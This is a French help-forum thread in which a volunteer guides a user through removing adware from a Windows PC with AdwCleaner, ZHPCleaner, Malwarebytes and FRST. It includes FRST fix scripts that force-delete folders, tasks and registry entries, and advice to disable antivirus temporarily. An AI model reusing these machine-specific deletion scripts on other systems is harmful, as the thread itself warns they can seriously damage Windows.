2016-01-06 08:21 - 2016-01-06 08:19 - 0000182 _____ () C:\Users\MARIE\AppData\Roaming\LaunchBrowser_ed.exe.config
C:\ProgramData\Dlaauafoomg
C:\Program Files\Web Shield
cmd: ipconfig /flushdns
cmd: netsh winsock reset
EmptyTemp:
end

Redémarre ton ordinateur s'il ne le fait pas automatiquement


 Héberge ce rapport sur ce site d'hébergement de fichiers (http://security-x.fr/up/) et indique les liens fournis dans ta réponse. Aide en images (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)


/!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnement et endommager Windows /!\



***


=> AdwCleaner- Scanner:

/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

Aide en image pour AdwCleaner (http://forum.security-x.fr/tutoriels-317/%28tutoriel%29-adwcleaner/)



***

deux rapports attendus
--> Fixlog.txt
--> AdwCleaner(S).txt --> mode scanner/rechercher
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 13, 2016, 21:38:01
bonjour,
Merci de votre message.
Voici le lien pour le rapport fixlog

http://up.security-x.fr/file.php?h=R721a6db5b4d08a511aee75630e9fdfb2

A bientôt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 14, 2016, 13:03:57
Bonjour,
Voici le 2eme rapport:

http://up.security-x.fr/file.php?h=Racbd4f170698e082d8641a03519e0790

merci
A bientôt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 14, 2016, 17:27:57
re

tu vas créer un point de restauration (on les supprime à la fin) --> nomme le de façon à savoir que c'est le point de restauration avant les suppressions
créer un point de restauration vista (http://www.chantal11.com/2009/04/creer-un-point-de-restauration-sous-vista/)
créer un point de restauration seven (http://www.chantal11.com/2009/04/creer-point-de-restauration-sous-windows/)
créer un point de restauration Windows 8.1 (http://www.chantal11.com/2012/11/creer-un-point-de-restauration-windows-8/)
créer un point de restauration Windows 10 (http://windows.microsoft.com/fr-fr/windows-10/create-a-system-restore-point)

AdwCleaner - Correction/Suppression

/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

Sous IE, le filtre SmartScreen déclenche une alerte. Cliquer sur Actions puis sur Exécuter quand même

Héberge ce rapport sur ce site d'hébergement de fichiers (http://security-x.fr/up/) et indique les liens fournis dans ta réponse. Aide en images (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)

Si ton antivirus émet une alerte ou bloque l'outil, il faut le désactiver temporairement (le fichier AdwCleaner.exe est sûr)
Aide en image pour AdwCleaner (http://forum.security-x.fr/tutoriels-317/%28tutoriel%29-adwcleaner/)



***


ZHPCleaner-Scanner

/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

Tutoriel d'utilisation ZHPCleaner en images (http://forum.security-x.fr/tutoriels-317/tutoriel-zhpcleaner/)


Héberge ce rapport sur ce site d'hébergement de fichiers (http://security-x.fr/up/) et indique les liens fournis dans ta réponse. Aide en images (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)


***

deux rapports attendus
--> C:\AdwCleaner(C).txt --> mode correction/suppression
--> ZHPCleaner.txt --> mode scanner/rechercher
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 17, 2016, 05:29:25
re

des difficultés pour continuer la procédure ?
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 17, 2016, 14:00:16
Bonjour
merci.

OK pour ADWCleaner mais je ne comprends pas ce que je dois faire avec IE filtre smartscreen?

A bientôt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 17, 2016, 19:22:42
re

Citer
je ne comprends pas ce que je dois faire avec IE filtre smartscreen?

rien, comme tu utilises Chrome  ;)
ce message s'adresse pour ceux/celles qui utilise IE

Il faut que tu postes les  rapports, c'est important pour ton système

--> C:\AdwCleaner(C).txt --> mode correction/suppression
--> ZHPCleaner.txt --> mode scanner/rechercher

Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 20, 2016, 22:37:58
bonsoir

voici
http://up.security-x.fr/file.php?h=Rd1a33d851ced07fc767ac37048664974
http://up.security-x.fr/file.php?h=Rcc0c6b3269ea9726347a390b501711dc

a bientot
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 21, 2016, 08:10:15
re

très bien

ZHPCleaner-Nettoyer


/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

Héberge ce rapport sur ce site d'hébergement de fichiers (http://security-x.fr/up/) et indique les liens fournis dans ta réponse. Aide en images (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)


***


Malwarebytes

/!\ Ne passe l'outil qu'une seule fois afin de ne pas fausser le rapport /!\

Le journal d'examen est aussi enregistré sous C:\ProgramData\Malwarebytes\Malwarebytes' Anti-Malware\Logs[/list]

Tutoriel d'utilisation Malwarebytes Aide en images (http://forum.security-x.fr/tutoriels-317/tutoriel-malwarebytes-anti-malware-version-2/)

JOURNAL D'ANALYSE de Malwarebytes --> Exporter le rapport d'analyse (http://forum.security-x.fr/tutoriels-317/tutoriel-malwarebytes-anti-malware-version-2/msg116398/#msg116398)

Héberge ce rapport sur ce site d'hébergement de fichiers (http://security-x.fr/up/) et indique les liens fournis dans ta réponse. Aide en images (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)


***

deux rapports attendus
--> ZHPCleaner.txt  --> mode nettoyer/supprimer
--> Malwarebytes --> rapport d'analyse
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 21, 2016, 21:29:20
Bonjour,

voir 2 fichiers:
http://up.security-x.fr/file.php?h=Rb3c2eb00b7d97015d2910b8e6cf533ba
http://up.security-x.fr/file.php?h=Rb3c2eb00b7d97015d2910b8e6cf533ba

merci
A bientôt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 22, 2016, 08:32:32
re

tu m'as donné deux fois le rapport de ZHPCleaner

Peux tu poster le rapport de Malwarebytes: JOURNAL D'ANALYSE de Malwarebytes --> Exporter le rapport d'analyse (http://forum.security-x.fr/tutoriels-317/tutoriel-malwarebytes-anti-malware-version-2/msg116398/#msg116398)


***

comment se comporte ton système ?
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 22, 2016, 21:38:40
Bonsoir,

Désolé, voici le rapport:

http://up.security-x.fr/file.php?h=R444b4a0c7110e4812de7be2d719be446

A bientôt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 23, 2016, 07:55:26
re

ouvre  Malwarebytes  (clic droit exécuter en tant qu'administrateur)
clique sur l'onglet Historique puis --> Quarantaine et cliques sur Supprimer tout


***


comment se comporte ton système ?


***


Un dernier effort avant de conclure  ;)
j'aimerais vérifier quelque chose

Peux tu refaire FRST, clic droit sur FRST.exe (Exécuter en tant qu'administrateur), coche la case Addition.txt et poste les deux nouveaux rapports
--> FRST.txt
--> Addition.txt

Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 24, 2016, 17:55:32
Bonjour,

Voici les 2 rapports:
http://up.security-x.fr/file.php?h=R7b02c6b5ab70e92696df4428b5088c4f
http://up.security-x.fr/file.php?h=R36cb14d9f2627a18bec87a976fcf1f13

Merci :sup:
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 26, 2016, 09:16:39
re

Citer
Merci :sup:

je suppose que cela signifie que ton ordinateur se comporte mieux

Est ce que tu te connectes à un compte Google avec Chrome ?
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le janvier 30, 2016, 08:46:06
re

tu en est où ?

car ce n'est pas fini ...
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le janvier 31, 2016, 17:25:05
Bonjour,

Merci cela va mieux..
Oui pour Google chrome.

Désolé pour le délai
A bientot
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le février 01, 2016, 10:27:27
re

Citer
Oui pour Google chrome

il faut donc supprimer les données synchronisées de ton compte Google (les données seront toujours disponibles dans Chrome sur tes appareils)

--> Ouvre Google Dashboard. Assure-toi d'être connecté à ton compte Google.
--> Clique sur Réinitialiser la synchronisation pour arrêter la synchronisation et effacer toutes les données synchronisées.
--> Clique sur OK.
Option 2 : Interrompre la synchronisation et supprimer les données synchronisées (réinitialiser la synchronisation) (https://support.google.com/chrome/answer/2390059?hl=fr)

ou bien
Supprimer les informations synchronisées de votre compte (https://support.google.com/chromebook/answer/2914794?hl=fr&rd=1)
(Toutes les informations synchronisées sont alors supprimées de votre compte Google. Tous vos favoris, vos applications et vos extensions demeurent sur votre Chromebook)


***

Une fois la suppression des données synchronisées faite


--> Ouvre le Bloc-notes Aide en image pour ouvrir le bloc note windows 8 (http://www.chantal11.com/2014/04/ouvrir-le-bloc-notes-windows-8-1/)
Copie/colle la totalité du contenu de la zone Code ci-dessous dans le Bloc-notes
--> de start inclus dans le copié à end inclus dans le copié

start
CreateRestorePoint:
CloseProcesses:
Task: {8A6DDF93-72DE-43CD-978C-9CE076553EE3} - \{80ED55F8-296C-45A6-9739-231C9BBA3888} -> Pas de fichier <==== ATTENTION 
Task: {AC674866-5B68-4BA6-A1BB-13DBEE156669} - \Woeno -> Pas de fichier <==== ATTENTION 
ShortcutWithArgument: C:\Users\Public\Desktop\Booking.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.booking.com/index.en-us.html?aid=398438&label=dticon
HKLM\...\RunOnce: [ZHPCleaner_Folder1] => CMD /c DEL "C:\Windows\System32\config\systemprofile\AppData\Local\WebBar" /F /Q
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
CHR HomePage: Default -> hxxp://www.oursurfing.com/?type=sy&ts=1439716213&z=1b402b73c9149486e8baeb9gbz3c3tam0g3q9o9g0c&from=age&uid=ST1000LM024XHN-M101MBB_S31LJ9AG316460
C:\Windows\System32\config\systemprofile\AppData\Local\WebBar
EmptyTemp:
end

Redémarre ton ordinateur s'il ne le fait pas automatiquement


 Héberge ce rapport sur ce site d'hébergement de fichiers (http://security-x.fr/up/) et indique les liens fournis dans ta réponse. Aide en images (http://forum.security-x.fr/cours-et-tutoriels-322/(tutoriel)-impression-d%27ecran-et-hebergement-de-rapport/msg60884/#msg60884)

un rapport attendu
--> Fixlog.txt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le février 04, 2016, 21:15:53
 :AAC

toujours là ?
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: delph le février 28, 2016, 22:52:07
bonsoir,
Voici le rapport:

http://up.security-x.fr/file.php?h=Rb8fbf7254bd1ca9d693a79c512c8549d
merci
a bientôt
Titre: Re : ouverture de pages de pub inopinées malgré mon anti virus
Posté par: xsun le février 29, 2016, 22:19:07
re

Faire le fix de FRST 27 jours après la demande, fait qu'il ne représente plus ton système aux environs du 1er février,
même s'il a fonctionné pour les éléments du fix, il est valable à un instant T, car près d'un mois après, ton système n'est plus le même
d'autres éléments auraient peut être été inclus ....


comment se comporte ton système ?